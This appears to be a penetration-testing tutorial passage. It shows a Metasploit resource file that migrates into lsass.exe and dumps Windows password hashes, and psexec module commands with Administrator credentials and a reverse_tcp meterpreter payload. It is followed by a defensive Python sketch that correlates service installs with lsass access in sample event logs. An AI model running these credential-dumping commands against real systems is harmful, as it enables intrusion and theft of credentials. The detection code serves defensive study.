- First, we need to create a file with the commands we want to execute. In this example, we will migrate to the lsass.exe process and dump the Windows hashes:
root@kali:~# cat autoruncmds.rc
migrate -N lsass.exe
hashdump
- Next, we will use the exploit/windows/smb/psexec exploit module to compromise the target and use AUTORUNSCRIPT to specify the command we want to execute as soon as we receive a new session:
msf > use exploit/windows/smb/psexec
msf exploit(psexec) > set RHOST 192.168.216.10
RHOST => 192.168.216.10
msf exploit(psexec) > set SMBUSER Administrator
SMBUSER => Administrator
msf exploit(psexec) > set SMBPASS vagrant
SMBPASS => vagrant
msf exploit(psexec) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
PAYLOAD => windows/x64/meterpreter/reverse_tcp
...
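From the defender's side, a service-based remote execution followed within seconds by injection into lsass.exe leaves a trail that can be correlated. The sketch below is an added example, not part of the original text: it flags a service install (System event 7045) followed shortly by a Sysmon event 8 (CreateRemoteThread) or 10 (ProcessAccess) targeting lsass.exe on the same host. The event dictionaries, field names, host names and sample values are constructed assumptions, not real telemetry.

```python
from datetime import datetime, timedelta

# Constructed sample events (not real telemetry), already normalised to dicts.
# Field names are assumptions modelled on System event 7045 and Sysmon events 8/10.
SAMPLE_EVENTS = [
    {"ts": "2024-01-01T10:00:00", "host": "WIN-A", "event_id": 7045,
     "service_name": "qXzLmPrT", "image_path": "%SYSTEMROOT%\\AbCdEfGh.exe"},
    {"ts": "2024-01-01T10:00:04", "host": "WIN-A", "event_id": 8,
     "source_image": "C:\\Windows\\AbCdEfGh.exe",
     "target_image": "C:\\Windows\\System32\\lsass.exe"},
    {"ts": "2024-01-01T10:30:00", "host": "WIN-B", "event_id": 7045,
     "service_name": "BackupAgent",
     "image_path": "C:\\Program Files\\Backup\\agent.exe"},
    {"ts": "2024-01-01T12:00:00", "host": "WIN-B", "event_id": 10,
     "source_image": "C:\\Program Files\\AV\\scan.exe",
     "target_image": "C:\\Windows\\System32\\lsass.exe"},
]

SERVICE_INSTALL_ID = 7045   # Service Control Manager: a service was installed
LSASS_EVENT_IDS = {8, 10}   # Sysmon CreateRemoteThread / ProcessAccess


def correlate(events, window_seconds=60):
    """Return alerts where a service install on a host is followed, within
    window_seconds, by a process touching lsass.exe on the same host."""
    window = timedelta(seconds=window_seconds)
    last_install = {}  # host -> (timestamp, service install event)
    alerts = []
    for ev in sorted(events, key=lambda e: e["ts"]):
        ts = datetime.fromisoformat(ev["ts"])
        if ev["event_id"] == SERVICE_INSTALL_ID:
            last_install[ev["host"]] = (ts, ev)
        elif (ev["event_id"] in LSASS_EVENT_IDS
              and ev.get("target_image", "").lower().endswith("\\lsass.exe")
              and ev["host"] in last_install):
            installed_at, svc = last_install[ev["host"]]
            if ts - installed_at <= window:
                alerts.append({"host": ev["host"],
                               "service": svc["service_name"],
                               "source_image": ev["source_image"],
                               "delay_s": int((ts - installed_at).total_seconds())})
    return alerts


if __name__ == "__main__":
    for alert in correlate(SAMPLE_EVENTS):
        print(alert)
```

The short default window keeps routine lsass.exe access by security tooling, such as the constructed WIN-B scanner event, from matching an unrelated earlier service install.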